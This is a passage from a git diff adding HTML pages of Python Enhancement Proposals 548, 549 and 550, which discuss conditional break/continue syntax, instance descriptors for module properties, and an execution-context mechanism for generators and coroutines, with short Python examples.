+while <condition>:
+    <loop body>
+    <setup code>
+
+
+
+

That PEP was rejected because no syntax was found that was superior +to the following form:

+
while True:
+    <setup code>
+    if not <condition>:
+        break
+    <loop body>
+
+
+

This PEP proposes a superior form, one that also has application to +for loops. It is superior because it makes the flow of control in +loops more explicit, while preserving Python’s indentation aesthetic.

+
+
+

Syntax

+

The syntax of the break and continue statements are extended +as follows:

+
break_stmt : "break" ["if" expression]
+continue_stmt : "continue" ["if" expression]
+
+
+

In addition, the syntax of the while statement is modified as follows:

+
while_stmt : while1_stmt|while2_stmt
+while1_stmt : "while" expression ":" suite
+              ["else" ":" suite]
+while2_stmt : "while" ":" suite
+
+
+
+
+

Semantics

+

A break if or continue if is executed if and only if +expression evaluates to true.

+

A while statement with no expression loops until a break or return +is executed (or an error is raised), as if it were a while True +statement. Given that the loop can never terminate except in a +way that would not cause an else suite to execute, no else +suite is allowed in the expressionless form. If practical, it +should also be an error if the body of an expressionless while +does not contain at least one break or return statement.
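For reference, a runnable current-Python equivalent of these semantics:
+break if <expr> behaves exactly like if <expr>: break, and an
+expressionless while behaves like while True:
+
import io
+
+def read_until_nul(fp):
+    chunks = []
+    while True:                    # proposed spelling: "while:"
+        s = fp.read(1)
+        if not s or s == b"\x00":  # proposed: "break if not s or s == NUL"
+            break
+        chunks.append(s)
+    return b"".join(chunks)
+
+assert read_until_nul(io.BytesIO(b"ab\x00cd")) == b"ab"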

+
+
+

Justification and Examples

+

The previous “best possible” form:

+
while True:
+    <setup code>
+    if not <condition>:
+        break
+    <loop body>
+
+
+

could be formatted as:

+
while True:
+    <setup code>
+    if not <condition>: break
+    <loop body>
+
+
+

This is superficially almost identical to the form proposed by this +PEP:

+
while:
+    <setup code>
+    break if not <condition>
+    <loop body>
+
+
+

The significant difference here is that the loop flow control +keyword appears first in the line of code. This makes it easier +to comprehend the flow of control in the loop at a glance, especially +when reading colorized code.

+

For example, this is a common code pattern, taken in this case +from the tarfile module:

+
while True:
+    buf = self._read(self.bufsize)
+    if not buf:
+        break
+    t.append(buf)
+
+
+

Reading this, we either see the break and possibly need to think about +where the while is that it applies to, since the break is indented +under the if, and then track backward to read the condition that +triggers it; or, we read the condition and only afterward discover +that this condition changes the flow of the loop.

+

With the new syntax this becomes:

+
while:
+    buf = self._read(self.bufsize)
+    break if not buf
+    t.append(buf)
+
+
+

Reading this we first see the break, which obviously applies to +the while since it is at the same level of indentation as the loop +body, and then we read the condition that causes the flow of control +to change.

+

Further, consider a more complex example from sre_parse:

+
while True:
+    c = self.next
+    self.__next()
+    if c is None:
+        if not result:
+            raise self.error("missing group name")
+        raise self.error("missing %s, unterminated name" % terminator,
+                         len(result))
+    if c == terminator:
+        if not result:
+            raise self.error("missing group name", 1)
+        break
+    result += c
+return result
+
+
+

This is the natural way to write this code given current Python +loop control syntax. However, given break if, it would be more +natural to write this as follows:

+
while:
+    c = self.next
+    self.__next()
+    break if c is None or c == terminator
+    result += c
+if not result:
+    raise self.error("missing group name")
+elif c is None:
+    raise self.error("missing %s, unterminated name" % terminator,
+                     len(result))
+return result
+
+
+

This form moves the error handling out of the loop body, leaving the +loop logic much more understandable. While it would certainly be +possible to write the code this way using the current syntax, the +proposed syntax makes it more natural to write it in the clearer form.

+

The proposed syntax also provides a natural, Pythonic spelling of +the classic repeat ... until <expression> construct found in +other languages, and for which no good syntax has previously been +found for Python:

+
while:
+    ...
+    break if <expression>
+
+
+

The tarfile module, for example, has a couple of “read until” loops like +the following:

+
while True:
+    s = self.__read(1)
+    if not s or s == NUL:
+        break
+
+
+

With the new syntax this would read more clearly:

+
while:
+    s = self.__read(1)
+    break if not s or s == NUL
+
+
+

The case for extending this syntax to continue is less strong, +but buttressed by the value of consistency.

+

It is much more common for a continue statement to be at the +end of a multiline if suite, such as this example from zipfile

+
while True:
+    try:
+        self.fp = io.open(file, filemode)
+    except OSError:
+        if filemode in modeDict:
+            filemode = modeDict[filemode]
+            continue
+        raise
+    break
+
+
+

The only opportunity for improvement the new syntax would offer for +this loop would be the omission of the True token.

+

On the other hand, consider this example from uuid.py:

+
for i in range(adapters.length):
+    ncb.Reset()
+    ncb.Command = netbios.NCBRESET
+    ncb.Lana_num = ord(adapters.lana[i])
+    if win32wnet.Netbios(ncb) != 0:
+        continue
+    ncb.Reset()
+    ncb.Command = netbios.NCBASTAT
+    ncb.Lana_num = ord(adapters.lana[i])
+    ncb.Callname = '*'.ljust(16)
+    ncb.Buffer = status = netbios.ADAPTER_STATUS()
+    if win32wnet.Netbios(ncb) != 0:
+        continue
+    status._unpack()
+    bytes = status.adapter_address[:6]
+    if len(bytes) != 6:
+        continue
+    return int.from_bytes(bytes, 'big')
+
+
+

This becomes:

+
for i in range(adapters.length):
+    ncb.Reset()
+    ncb.Command = netbios.NCBRESET
+    ncb.Lana_num = ord(adapters.lana[i])
+    continue if win32wnet.Netbios(ncb) != 0
+    ncb.Reset()
+    ncb.Command = netbios.NCBASTAT
+    ncb.Lana_num = ord(adapters.lana[i])
+    ncb.Callname = '*'.ljust(16)
+    ncb.Buffer = status = netbios.ADAPTER_STATUS()
+    continue if win32wnet.Netbios(ncb) != 0
+    status._unpack()
+    bytes = status.adapter_address[:6]
+    continue if len(bytes) != 6
+    return int.from_bytes(bytes, 'big')
+
+
+

This example indicates that there are non-trivial use cases where +continue if also improves the readability of the loop code.

+

It is probably significant to note that all of the examples selected +for this PEP were found by grepping the standard library for while +True and continue, and the relevant examples were found in +the first four modules inspected.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0548.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0549/index.html b/pep-0549/index.html new file mode 100644 index 00000000000..1dc00686421 --- /dev/null +++ b/pep-0549/index.html @@ -0,0 +1,258 @@ + + + + + + + + PEP 549 – Instance Descriptors | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 549 – Instance Descriptors

+
+
Author:
+
Larry Hastings <larry at hastings.org>
+
Discussions-To:
+
Python-Dev list
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
04-Sep-2017
+
Python-Version:
+
3.7
+
Post-History:
+
04-Sep-2017
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

https://mail.python.org/pipermail/python-dev/2017-November/150528.html

+
+
+

Abstract

+

Python’s descriptor protocol requires that descriptors +be members of the type of an object. This PEP proposes +an extension to the descriptor protocol allowing use of +the descriptor protocol for members of instances. This +would permit using properties in modules.

+
+
+

Rationale

+

Python’s descriptor protocol guides programmers towards +elegant API design. If your class supports a data-like +member, and you might someday need to run code when +changing the member’s value, you’re encouraged to +simply declare it as a simple data member of the class +for now. If in the future you do need to run code, you +can change it to a “property”, and happily the API doesn’t +change.

+

But consider this second bit of best-practice Python API design: +if you’re writing a singleton, don’t write a class, just build +your code directly into a module. Don’t make your users +instantiate a singleton class, don’t make your users have to +dereference through a singleton object stored in a module, +just have module-level functions and module-level data.

+

Unfortunately these two best practices are in opposition. +The problem is that properties aren’t supported on modules. +Modules are instances of a single generic module type, +and it’s not feasible to modify or subclass this type to add +a property to one’s module. This means that programmers +facing this API design decision, where the data-like member +is a singleton stored in a module, must preemptively add +ugly “getters” and “setters” for the data.

+

Adding support for module properties in pure Python has recently +become possible; +as of Python 3.5, Python permits assigning to the __class__ +attribute of module objects, specifically for this purpose. Here’s +an example of using this functionality to add a property to a module:

+
import sys, types
+class _MyModuleType(types.ModuleType):
+    @property
+    def prop(self):  # a property getter takes only the instance
+        ...
+
+sys.modules[__name__].__class__ = _MyModuleType
+
+
+

This works, and is supported behavior, but it’s clumsy and obscure.

+

This PEP proposes a per-type opt-in extension to the descriptor +protocol specifically designed to enable properties in modules. +The mechanism is a way to honor the descriptor protocol for +members of instances of a class without the member being declared +as a class variable.

+

Although this is being proposed as a general mechanism, the author +currently only foresees this as being useful for module objects.

+
+
+

Implementation

+

The basic idea is simple: modify the tp_getattro and tp_setattro +functions exposed by PyModule_Type to inspect the attribute being +accessed, and if that attribute supports the descriptor protocol, +call the relevant descriptor function.

+

Our implementation faces two challenges:

+
    +
  1. Since this code will be run every time an attribute is looked up on a +module, it needs to add very little overhead in the general case, +where the object stored in the attribute is not a descriptor.
  2. +
  3. Since functions are descriptors, we must take care to not honor +the descriptor protocol for all objects. Otherwise, all module-level +functions will suddenly become bound to the module instance as if +they were method calls on the module object. The module handle would +be passed in as a “self” argument to all module-level functions.
  4. +
+

Both challenges can be solved with the same approach: we define a new +“fast subclass” flag that means “This object is a descriptor, and it +should be honored directly when this object is looked up as an +attribute of an instance”. So far this flag is only set on two +types: property and collections.abc.InstanceDescriptor. +The latter is an abstract base class, whose only purpose is +to allow user classes to inherit this “fast subclass” flag.

+
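
As a hedged sketch of the proposed opt-in (none of this ever +shipped, since the PEP was rejected), a user-defined descriptor +would inherit the flag from the new abstract base class:

+
import collections.abc
+
+class Computed(collections.abc.InstanceDescriptor):
+    # Hypothetical user descriptor: inheriting from
+    # InstanceDescriptor sets the "fast subclass" flag, so a
+    # Computed instance stored on a module would be honored as
+    # a descriptor during attribute lookup.
+    def __init__(self, func):
+        self.func = func
+
+    def __get__(self, instance, owner=None):
+        return self.func(instance)
+
+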
+
+

Prototype

+

A prototype of this functionality is under development +at GitHub [github].

+
+
+

Acknowledgements

+

Armin Rigo essentially proposed this mechanism when presented +with the idea of “module properties”, and educated the author +both on the complexities of the problem and the proper solution. +Nathaniel J. Smith pointed out the 3.5 extension about assigning +to __class__ on module objects, and provided the example.

+
+
+

References

+
+
+
[github]
+
+
The branch is here:
https://github.com/larryhastings/cpython/tree/module-properties
+
A pull request against the main CPython repo is here:
https://github.com/python/cpython/pull/3534
+
+
+
+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0549.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0550/index.html b/pep-0550/index.html new file mode 100644 index 00000000000..cb795d615c9 --- /dev/null +++ b/pep-0550/index.html @@ -0,0 +1,1838 @@ + + + + + + + + PEP 550 – Execution Context | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 550 – Execution Context

+
+
Author:
+
Yury Selivanov <yury at edgedb.com>, +Elvis Pranskevichus <elvis at edgedb.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
11-Aug-2017
+
Python-Version:
+
3.7
+
Post-History:
+
11-Aug-2017, 15-Aug-2017, 18-Aug-2017, 25-Aug-2017, +01-Sep-2017
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP adds a new generic mechanism of ensuring consistent access +to non-local state in the context of out-of-order execution, such +as in Python generators and coroutines.

+

Thread-local storage, such as threading.local(), is inadequate for +programs that execute concurrently in the same OS thread. This PEP +proposes a solution to this problem.

+
+
+

PEP Status

+

Due to its breadth and the lack of general consensus on some aspects, this +PEP has been withdrawn and superseded by a simpler PEP 567, which has +been accepted and included in Python 3.7.

+

PEP 567 implements the same core idea, but limits the ContextVar support +to asynchronous tasks while leaving the generator behavior untouched. +The latter may be revisited in a future PEP.

+
+
+

Rationale

+

Prior to the advent of asynchronous programming in Python, programs +used OS threads to achieve concurrency. The need for thread-specific +state was solved by threading.local() and its C-API equivalent, +PyThreadState_GetDict().

+

A few examples of where thread-local storage (TLS) is commonly +relied upon:

+
    +
  • Context managers like decimal contexts, numpy.errstate, +and warnings.catch_warnings.
  • +
  • Request-related data, such as security tokens and request +data in web applications, language context for gettext etc.
  • +
  • Profiling, tracing, and logging in large code bases.
  • +
+

Unfortunately, TLS does not work well for programs which execute +concurrently in a single thread. A Python generator is the simplest +example of a concurrent program. Consider the following:

+
import decimal
+from decimal import Decimal
+
+def fractions(precision, x, y):
+    with decimal.localcontext() as ctx:
+        ctx.prec = precision
+        yield Decimal(x) / Decimal(y)
+        yield Decimal(x) / Decimal(y ** 2)
+
+g1 = fractions(precision=2, x=1, y=3)
+g2 = fractions(precision=6, x=2, y=3)
+
+items = list(zip(g1, g2))
+
+
+

The intuitively expected value of items is:

+
[(Decimal('0.33'), Decimal('0.666667')),
+ (Decimal('0.11'), Decimal('0.222222'))]
+
+
+

Rather surprisingly, the actual result is:

+
[(Decimal('0.33'), Decimal('0.666667')),
+ (Decimal('0.111111'), Decimal('0.222222'))]
+
+
+

This is because the implicit Decimal context is stored as a thread-local, +so concurrent iteration of the fractions() generator would +corrupt the state. For Decimal, specifically, the only current +workaround is to use explicit context method calls for all arithmetic +operations [28]. Arguably, this defeats the usefulness of overloaded +operators and makes even simple formulas hard to read and write.

+
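
For concreteness, a minimal sketch of that explicit-context +workaround (the fractions_explicit name is invented for +illustration):

+
import decimal
+from decimal import Decimal
+
+def fractions_explicit(precision, x, y):
+    # Every operation goes through an explicit Context object,
+    # so no thread-local state is consulted.
+    ctx = decimal.Context(prec=precision)
+    yield ctx.divide(Decimal(x), Decimal(y))
+    yield ctx.divide(Decimal(x), ctx.power(Decimal(y), Decimal(2)))
+
+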

Coroutines are another class of Python code where TLS unreliability +is a significant issue.

+

The inadequacy of TLS in asynchronous code has led to the +proliferation of ad-hoc solutions, which are limited in scope and +do not support all required use cases.

+

The current status quo is that any library (including the standard +library) which relies on TLS is likely to be broken when used in +asynchronous code or with generators (see [3] for an example issue).

+

Some languages that support coroutines or generators recommend +passing the context manually as an argument to every function; see +[1] for an example. This approach, however, has limited use for +Python, where there is a large ecosystem that was built to work with +a TLS-like context. Furthermore, libraries like decimal or +numpy rely on context implicitly in overloaded operator +implementations.

+

The .NET runtime, which has support for async/await, has a generic +solution for this problem, called ExecutionContext (see [2]).

+
+
+

Goals

+

The goal of this PEP is to provide a more reliable +threading.local() alternative, which:

+
    +
  • provides the mechanism and the API to fix non-local state issues +with coroutines and generators;
  • +
  • implements TLS-like semantics for synchronous code, so that +users like decimal and numpy can switch to the new +mechanism with minimal risk of breaking backwards compatibility;
  • +
  • has no or negligible performance impact on the existing code or +the code that will be using the new mechanism, including +C extensions.
  • +
+
+
+

High-Level Specification

+

The full specification of this PEP is broken down into three parts:

+
    +
  • High-Level Specification (this section): the description of the +overall solution. We show how it applies to generators and +coroutines in user code, without delving into implementation +details.
  • +
  • Detailed Specification: the complete description of new concepts, +APIs, and related changes to the standard library.
  • +
  • Implementation Details: the description and analysis of data +structures and algorithms used to implement this PEP, as well as +the necessary changes to CPython.
  • +
+

For the purpose of this section, we define execution context as an +opaque container of non-local state that allows consistent access to +its contents in the concurrent execution environment.

+

A context variable is an object representing a value in the +execution context. A call to contextvars.ContextVar(name) +creates a new context variable object. A context variable object has +three methods:

+
    +
  • get(): returns the value of the variable in the current +execution context;
  • +
  • set(value): sets the value of the variable in the current +execution context;
  • +
  • delete(): can be used for restoring variable state; its +purpose and semantics are explained in +Setting and restoring context variables.
  • +
+
+

Regular Single-threaded Code

+

In regular, single-threaded code that doesn’t involve generators or +coroutines, context variables behave like globals:

+
var = contextvars.ContextVar('var')
+
+def sub():
+    assert var.get() == 'main'
+    var.set('sub')
+
+def main():
+    var.set('main')
+    sub()
+    assert var.get() == 'sub'
+
+
+
+
+

Multithreaded Code

+

In multithreaded code, context variables behave like thread locals:

+
var = contextvars.ContextVar('var')
+
+def sub():
+    assert var.get() is None  # The execution context is empty
+                              # for each new thread.
+    var.set('sub')
+
+def main():
+    var.set('main')
+
+    thread = threading.Thread(target=sub)
+    thread.start()
+    thread.join()
+
+    assert var.get() == 'main'
+
+
+
+
+

Generators

+

Unlike regular function calls, generators can cooperatively yield +their control of execution to the caller. Furthermore, a generator +does not control where the execution would continue after it yields. +It may be resumed from an arbitrary code location.

+

For these reasons, the least surprising behaviour of generators is +as follows:

+
    +
  • changes to context variables are always local and are not visible +in the outer context, but are visible to the code called by the +generator;
  • +
  • once set in the generator, the context variable is guaranteed not +to change between iterations;
  • +
  • changes to context variables in outer context (where the generator +is being iterated) are visible to the generator, unless these +variables were also modified inside the generator.
  • +
+

Let’s review:

+
var1 = contextvars.ContextVar('var1')
+var2 = contextvars.ContextVar('var2')
+
+def gen():
+    var1.set('gen')
+    assert var1.get() == 'gen'
+    assert var2.get() == 'main'
+    yield 1
+
+    # Modification to var1 in main() is shielded by
+    # gen()'s local modification.
+    assert var1.get() == 'gen'
+
+    # But modifications to var2 are visible
+    assert var2.get() == 'main modified'
+    yield 2
+
+def main():
+    g = gen()
+
+    var1.set('main')
+    var2.set('main')
+    next(g)
+
+    # Modification of var1 in gen() is not visible.
+    assert var1.get() == 'main'
+
+    var1.set('main modified')
+    var2.set('main modified')
+    next(g)
+
+
+

Now, let’s revisit the decimal precision example from the Rationale +section, and see how the execution context can improve the situation:

+
import decimal
+
+# create a new context var
+decimal_ctx = contextvars.ContextVar('decimal context')
+
+# Pre-PEP 550 Decimal relies on TLS for its context.
+# For illustration purposes, we monkey-patch the decimal
+# context functions to use the execution context.
+# A real working fix would need to properly update the
+# C implementation as well.
+def patched_setcontext(context):
+    decimal_ctx.set(context)
+
+def patched_getcontext():
+    ctx = decimal_ctx.get()
+    if ctx is None:
+        ctx = decimal.Context()
+        decimal_ctx.set(ctx)
+    return ctx
+
+decimal.setcontext = patched_setcontext
+decimal.getcontext = patched_getcontext
+
+def fractions(precision, x, y):
+    with decimal.localcontext() as ctx:
+        ctx.prec = precision
+        yield Decimal(x) / Decimal(y)
+        yield Decimal(x) / Decimal(y ** 2)
+
+g1 = fractions(precision=2, x=1, y=3)
+g2 = fractions(precision=6, x=2, y=3)
+
+items = list(zip(g1, g2))
+
+
+

The value of items is:

+
[(Decimal('0.33'), Decimal('0.666667')),
+ (Decimal('0.11'), Decimal('0.222222'))]
+
+
+

which matches the expected result.

+
+
+

Coroutines and Asynchronous Tasks

+

Like generators, coroutines can yield and regain control. The major +difference from generators is that coroutines do not yield to the +immediate caller. Instead, the entire coroutine call stack +(coroutines chained by await) switches to another coroutine call +stack. In this regard, await-ing on a coroutine is conceptually +similar to a regular function call, and a coroutine chain +(or a “task”, e.g. an asyncio.Task) is conceptually similar to a +thread.

+

From this similarity we conclude that context variables in coroutines +should behave like “task locals”:

+
    +
  • changes to context variables in a coroutine are visible to the +coroutine that awaits on it;
  • +
  • changes to context variables made in the caller prior to awaiting +are visible to the awaited coroutine;
  • +
  • changes to context variables made in one task are not visible in +other tasks;
  • +
  • tasks spawned by other tasks inherit the execution context from the +parent task, but any changes to context variables made in the +parent task after the child task was spawned are not visible.
  • +
+

The last point shows behaviour that is different from OS threads. +OS threads do not inherit the execution context by default. +There are two reasons for this: common usage intent and backwards +compatibility.

+

The main reason why tasks inherit the context and threads do +not is common usage intent. Tasks are often used for relatively +short-running operations which are logically tied to the code that +spawned the task (like running a coroutine with a timeout in +asyncio). OS threads, on the other hand, are normally used for +long-running, logically separate code.

+

With respect to backwards compatibility, we want the execution context +to behave like threading.local(). This is so that libraries can +start using the execution context in place of TLS with a lesser risk +of breaking compatibility with existing code.

+

Let’s review a few examples to illustrate the semantics we have just +defined.

+

Context variable propagation in a single task:

+
import asyncio
+
+var = contextvars.ContextVar('var')
+
+async def main():
+    var.set('main')
+    await sub()
+    # The effect of sub() is visible.
+    assert var.get() == 'sub'
+
+async def sub():
+    assert var.get() == 'main'
+    var.set('sub')
+    assert var.get() == 'sub'
+
+loop = asyncio.get_event_loop()
+loop.run_until_complete(main())
+
+
+

Context variable propagation between tasks:

+
import asyncio
+
+var = contextvars.ContextVar('var')
+
+async def main():
+    var.set('main')
+    loop.create_task(sub())  # schedules asynchronous execution
+                             # of sub().
+    assert var.get() == 'main'
+    var.set('main changed')
+
+async def sub():
+    # Sleeping will make sub() run after
+    # "var" is modified in main().
+    await asyncio.sleep(1)
+
+    # The value of "var" is inherited from main(), but any
+    # changes to "var" made in main() after the task
+    # was created are *not* visible.
+    assert var.get() == 'main'
+
+    # This change is local to sub() and will not be visible
+    # to other tasks, including main().
+    var.set('sub')
+
+loop = asyncio.get_event_loop()
+loop.run_until_complete(main())
+
+
+

As shown above, changes to the execution context are local to the +task, and tasks get a snapshot of the execution context at the point +of creation.

+

There is one narrow edge case when this can lead to surprising +behaviour. Consider the following example where we modify the +context variable in a nested coroutine:

+
async def sub(var_value):
+    await asyncio.sleep(1)
+    var.set(var_value)
+
+async def main():
+    var.set('main')
+
+    # waiting for sub() directly
+    await sub('sub-1')
+
+    # var change is visible
+    assert var.get() == 'sub-1'
+
+    # waiting for sub() with a timeout;
+    await asyncio.wait_for(sub('sub-2'), timeout=2)
+
+    # wait_for() creates an implicit task, which isolates
+    # context changes, which means that the below assertion
+    # will fail.
+    assert var.get() == 'sub-2'  #  AssertionError!
+
+
+

However, relying on context changes leaking to the caller is +ultimately a bad pattern. For this reason, the behaviour shown in +the above example is not considered a major issue and can be +addressed with proper documentation.

+
+
+
+

Detailed Specification

+

Conceptually, an execution context (EC) is a stack of logical +contexts. There is always exactly one active EC per Python thread.

+

A logical context (LC) is a mapping of context variables to their +values in that particular LC.

+

A context variable is an object representing a value in the +execution context. A new context variable object is created by +calling contextvars.ContextVar(name: str). The value of the +required name argument is not used by the EC machinery, but may +be used for debugging and introspection.

+

The context variable object has the following methods and attributes:

+
    +
  • name: the value passed to ContextVar().
  • +
  • get(*, topmost=False, default=None): if topmost is False +(the default), traverses the execution context top to bottom until +the variable value is found. If topmost is True, returns +the value of the variable in the topmost logical context. +If the variable value was not found, returns the value of default. +(See the sketch after this list.)
  • +
  • set(value): sets the value of the variable in the topmost +logical context.
  • +
  • delete(): removes the variable from the topmost logical context. +Useful when restoring the logical context to the state prior to the +set() call, for example, in a context manager, see +Setting and restoring context variables for more information.
  • +
+
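
A short sketch of these lookup semantics (using the API proposed +by this withdrawn PEP, not the contextvars module that ultimately +shipped in Python 3.7):

+
var = contextvars.ContextVar('var')
+
+def gen():
+    # A generator runs with its own, initially empty, topmost LC.
+    assert var.get() == 'outer'            # full-stack lookup
+    assert var.get(topmost=True) is None   # topmost LC only
+    var.set('inner')
+    assert var.get(topmost=True) == 'inner'
+    yield
+
+var.set('outer')
+list(gen())  # runs the asserts above
+
+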
+

Generators

+

When created, each generator object has an empty logical context +object stored in its __logical_context__ attribute. This logical +context is pushed onto the execution context at the beginning of each +generator iteration and popped at the end:

+
var1 = contextvars.ContextVar('var1')
+var2 = contextvars.ContextVar('var2')
+
+def gen():
+    var1.set('var1-gen')
+    var2.set('var2-gen')
+
+    # EC = [
+    #     outer_LC(),
+    #     gen_LC({var1: 'var1-gen', var2: 'var2-gen'})
+    # ]
+    n = nested_gen()  # nested_gen_LC is created
+    next(n)
+    # EC = [
+    #     outer_LC(),
+    #     gen_LC({var1: 'var1-gen', var2: 'var2-gen'})
+    # ]
+
+    var1.set('var1-gen-mod')
+    var2.set('var2-gen-mod')
+    # EC = [
+    #     outer_LC(),
+    #     gen_LC({var1: 'var1-gen-mod', var2: 'var2-gen-mod'})
+    # ]
+    next(n)
+
+def nested_gen():
+    # EC = [
+    #     outer_LC(),
+    #     gen_LC({var1: 'var1-gen', var2: 'var2-gen'}),
+    #     nested_gen_LC()
+    # ]
+    assert var1.get() == 'var1-gen'
+    assert var2.get() == 'var2-gen'
+
+    var1.set('var1-nested-gen')
+    # EC = [
+    #     outer_LC(),
+    #     gen_LC({var1: 'var1-gen', var2: 'var2-gen'}),
+    #     nested_gen_LC({var1: 'var1-nested-gen'})
+    # ]
+    yield
+
+    # EC = [
+    #     outer_LC(),
+    #     gen_LC({var1: 'var1-gen-mod', var2: 'var2-gen-mod'}),
+    #     nested_gen_LC({var1: 'var1-nested-gen'})
+    # ]
+    assert var1.get() == 'var1-nested-gen'
+    assert var2.get() == 'var2-gen-mod'
+
+    yield
+
+# EC = [outer_LC()]
+
+g = gen()  # gen_LC is created for the generator object `g`
+list(g)
+
+# EC = [outer_LC()]
+
+
+

The snippet above shows the state of the execution context stack +throughout the generator lifespan.

+
+
+

contextlib.contextmanager

+

The contextlib.contextmanager() decorator can be used to turn +a generator into a context manager. A context manager that +temporarily modifies the value of a context variable could be defined +like this:

+
var = contextvars.ContextVar('var')
+
+@contextlib.contextmanager
+def var_context(value):
+    original_value = var.get()
+
+    try:
+        var.set(value)
+        yield
+    finally:
+        var.set(original_value)
+
+
+

Unfortunately, this would not work straight away, as the modification +to the var variable is confined to the var_context() +generator and therefore will not be visible inside the with +block:

+
def func():
+    # EC = [{}, {}]
+
+    with var_context(10):
+        # EC becomes [{}, {}, {var: 10}] in the
+        # *var_context()* generator,
+        # but here the EC is still [{}, {}]
+
+        assert var.get() == 10  # AssertionError!
+
+
+

The way to fix this is to set the generator’s __logical_context__ +attribute to None. This will cause the generator to avoid +modifying the execution context stack.

+

We modify the contextlib.contextmanager() decorator to +set genobj.__logical_context__ to None to produce +well-behaved context managers:

+
def func():
+    # EC = [{}, {}]
+
+    with var_context(10):
+        # EC = [{}, {var: 10}]
+        assert var.get() == 10
+
+    # EC becomes [{}, {var: None}]
+
+
+
+
+

Enumerating context vars

+

The ExecutionContext.vars() method returns a list of +ContextVar objects that have values in the execution context. +This method is mostly useful for introspection and logging.

+
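
For example (a sketch against the proposed API):

+
# Log every context variable visible in the current EC.
+ec = contextvars.get_execution_context()
+for var in ec.vars():
+    print(var.name, var.get())
+
+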
+
+

&#13;Coroutines

+

In CPython, coroutines share the implementation with generators. +The difference is that in coroutines __logical_context__ defaults +to None. This affects both the async def coroutines and the +old-style generator-based coroutines (generators decorated with +@types.coroutine).

+
+
+

Asynchronous Generators

+

The execution context semantics of asynchronous generators do not +differ from those of regular generators.

+
+
+

asyncio

+

asyncio uses Loop.call_soon, Loop.call_later, +and Loop.call_at to schedule the asynchronous execution of a +function. asyncio.Task uses call_soon() to run the +wrapped coroutine.

+

We modify Loop.call_{at,later,soon} to accept the new +optional execution_context keyword argument, which defaults to +the copy of the current execution context:

+
def call_soon(self, callback, *args, execution_context=None):
+    if execution_context is None:
+        execution_context = contextvars.get_execution_context()
+
+    # ... some time later
+
+    contextvars.run_with_execution_context(
+        execution_context, callback, args)
+
+
+

The contextvars.get_execution_context() function returns a +shallow copy of the current execution context. By a shallow copy +we mean a new execution context such that:

+
    +
  • lookups in the copy provide the same results as in the original +execution context, and
  • +
  • any changes in the original execution context do not affect the +copy, and
  • +
  • any changes to the copy do not affect the original execution +context.
  • +
+

Either of the following satisfies the copy requirements:

+
    +
  • a new stack with shallow copies of logical contexts;
  • +
  • a new stack with one squashed logical context.
  • +
+

The contextvars.run_with_execution_context(ec, func, *args, +**kwargs) function runs func(*args, **kwargs) with ec as the +execution context. The function performs the following steps:

+
    +
  1. Set ec as the current execution context stack in the current +thread.
  2. +
  3. Push an empty logical context onto the stack.
  4. +
  5. Run func(*args, **kwargs).
  6. +
  7. Pop the logical context from the stack.
  8. +
  9. Restore the original execution context stack.
  10. +
  11. Return or raise the func() result.
  12. +
+

These steps ensure that ec cannot be modified by func, +which makes run_with_execution_context() idempotent.

+

asyncio.Task is modified as follows:

+
class Task:
+    def __init__(self, coro):
+        ...
+        # Get the current execution context snapshot.
+        self._exec_context = contextvars.get_execution_context()
+
+        # Create an empty Logical Context that will be
+        # used by coroutines run in the task.
+        coro.__logical_context__ = contextvars.LogicalContext()
+
+        self._loop.call_soon(
+            self._step,
+            execution_context=self._exec_context)
+
+    def _step(self, exc=None):
+        ...
+        self._loop.call_soon(
+            self._step,
+            execution_context=self._exec_context)
+        ...
+
+
+
+
+

Generators Transformed into Iterators

+

Any Python generator can be represented as an equivalent iterator. +Compilers like Cython rely on this axiom. With respect to the +execution context, such an iterator should behave the same way as the +generator it represents.

+

This means that there needs to be a Python API to create new logical +contexts and run code with a given logical context.

+

The contextvars.LogicalContext() function creates a new empty +logical context.

+

The contextvars.run_with_logical_context(lc, func, *args, +**kwargs) function can be used to run functions in the specified +logical context. The lc can be modified as a result of the call.

+

The contextvars.run_with_logical_context() function performs the +following steps:

+
    +
  1. Push lc onto the current execution context stack.
  2. +
  3. Run func(*args, **kwargs).
  4. +
  5. Pop lc from the execution context stack.
  6. +
  7. Return or raise the func() result.
  8. +
+

By using LogicalContext() and run_with_logical_context(), +we can replicate the generator behaviour like this:

+
class Generator:
+
+    def __init__(self):
+        self.logical_context = contextvars.LogicalContext()
+
+    def __iter__(self):
+        return self
+
+    def __next__(self):
+        return contextvars.run_with_logical_context(
+            self.logical_context, self._next_impl)
+
+    def _next_impl(self):
+        # Actual __next__ implementation.
+        ...
+
+
+

Let’s see how this pattern can be applied to an example generator:

+
# create a new context variable
+var = contextvars.ContextVar('var')
+
+def gen_series(n):
+    var.set(10)
+
+    for i in range(1, n):
+        yield var.get() * i
+
+# gen_series is equivalent to the following iterator:
+
+class CompiledGenSeries:
+
+    # This class is what the `gen_series()` generator can
+    # be transformed to by a compiler like Cython.
+
+    def __init__(self, n):
+        # Create a new empty logical context,
+        # like the generators do.
+        self.logical_context = contextvars.LogicalContext()
+
+        # Initialize the generator in its LC.
+        # Otherwise `var.set(10)` in the `_init` method
+        # would leak.
+        contextvars.run_with_logical_context(
+            self.logical_context, self._init, n)
+
+    def _init(self, n):
+        self.i = 1
+        self.n = n
+        var.set(10)
+
+    def __iter__(self):
+        return self
+
+    def __next__(self):
+        # Run the actual implementation of __next__ in our LC.
+        return contextvars.run_with_logical_context(
+            self.logical_context, self._next_impl)
+
+    def _next_impl(self):
+        if self.i == self.n:
+            raise StopIteration
+
+        result = var.get() * self.i
+        self.i += 1
+        return result
+
+
+

